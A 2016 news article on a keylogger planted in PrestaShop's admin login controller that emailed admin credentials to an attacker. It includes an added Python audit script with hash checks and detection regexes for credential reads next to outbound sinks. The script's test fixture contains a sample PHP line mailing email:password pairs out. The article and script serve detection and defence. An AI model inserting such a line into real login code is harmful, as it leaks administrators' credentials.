Crook collecting credentials of Prestashop admins

Oct 23, 2016 22:00 GMT

There's a new strain of web malware going around, according to Sucuri security experts, who say this sneaky threat is designed to log the admin credentials of e-commerce stores.

Currently targeting only Prestashop installations, this new threat was found on a hacked store by Sucuri researcher Conrado Torquato.

The researcher says the attacker gained access to the server and modified the "./controllers/admin/AdminLoginController.php" file to include a keylogger.

Malicious PHP code injected in Prestashop login page

This particular PHP file is responsible for loading the admin panel login page. The extra code the attacker added collected the text admins entered in the login form and sent it by email to the attacker's inbox.

Torquato says the attacker collected the site's domain, the login page's URL, and the admin's credentials (in cleartext).

"The email includes everything the attacker needs to log into the hacked Prestashop site," Torquato explained.
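Because the backdoor lived in a modified core file, the two checks a store operator can run are a hash comparison against a clean install and a scan for outbound sinks (mail, curl, sockets) sitting next to login-field reads in an admin controller. The script below is an added example, not Sucuri's or PrestaShop's code; the controller text, manifest and regex lists are constructed for illustration, and the field names `email`/`passwd` are assumed.

```python
import hashlib
import re
from pathlib import Path

# Heuristics (constructed here): outbound sinks, and the login fields a keylogger would read.
SINK_RE = re.compile(r"\b(mail|mb_send_mail|curl_exec|fsockopen|file_get_contents)\s*\(", re.I)
CRED_RE = re.compile(r"(?:\$_(?:POST|REQUEST)\[|Tools::getValue\()\s*['\"](email|passwd|password)['\"]", re.I)

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def audit_source(rel_path: str, src: str, baseline: dict) -> list:
    """Findings for one PHP file: drift from a known-good hash manifest,
    and credential fields co-located with an outbound sink."""
    findings = []
    expected = baseline.get(rel_path)
    if expected is None:
        findings.append("not in baseline manifest")
    elif expected != sha256_hex(src.encode()):
        findings.append("hash differs from baseline")
    sinks = sorted({m.group(1).lower() for m in SINK_RE.finditer(src)})
    creds = sorted({m.group(1).lower() for m in CRED_RE.finditer(src)})
    if sinks and creds:
        findings.append(f"credential fields {creds} reachable by sink(s) {sinks}")
    return findings

def audit_tree(root: Path, baseline: dict) -> dict:
    """Walk controllers/admin below a shop root; return {rel_path: findings}."""
    report = {}
    for p in sorted((root / "controllers" / "admin").glob("*.php")):
        rel = p.relative_to(root).as_posix()
        if found := audit_source(rel, p.read_text(errors="replace"), baseline):
            report[rel] = found
    return report

# Constructed stand-ins for the real controller (not PrestaShop's own code).
CLEAN_SRC = ("<?php\nclass AdminLoginController {\n  public function processLogin() {\n"
             "    $email = Tools::getValue('email');\n    $passwd = Tools::getValue('passwd');\n"
             "    return $this->checkCredentials($email, $passwd);\n  }\n}\n")
INJECTED_SRC = CLEAN_SRC.replace("    return $this",
             "    mail($dst, $_SERVER['HTTP_HOST'], $email . ':' . $passwd);\n    return $this")

def demo() -> dict:
    rel = "controllers/admin/AdminLoginController.php"
    baseline = {rel: sha256_hex(CLEAN_SRC.encode())}   # manifest taken from a clean install
    return {"clean": audit_source(rel, CLEAN_SRC, baseline),
            "injected": audit_source(rel, INJECTED_SRC, baseline)}

if __name__ == "__main__":
    print(demo())
```

In practice the manifest is generated from a pristine copy of the same PrestaShop release and kept off the web server, since an attacker with write access to the document root can rewrite a manifest stored beside the code.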

Attacker logged admin credentials despite already hacking the server

What Torquato didn't explain is why an attacker would need admin credentials when he had already compromised the site and edited its source code. The attacker clearly had access to everything he needed, and he could easily have created his own admin account.

A possible reason is that some stores are just the public face of a much larger company. The attacker may be hoping that some shop admins reused their Prestashop credentials for other internal systems such as intranets, CRMs, HRMs, VPS servers, firewalls, and others, which would grant the hacker access to systems storing other sensitive information he could steal.

The Sucuri researcher says that, at the time of his investigation, the Gmail address to which the credentials were emailed had already been removed, most likely by Google following an abuse report.

Credential stealers are not often seen on online stores. In most cases, security experts find malicious code that collects payment card details from checkout forms.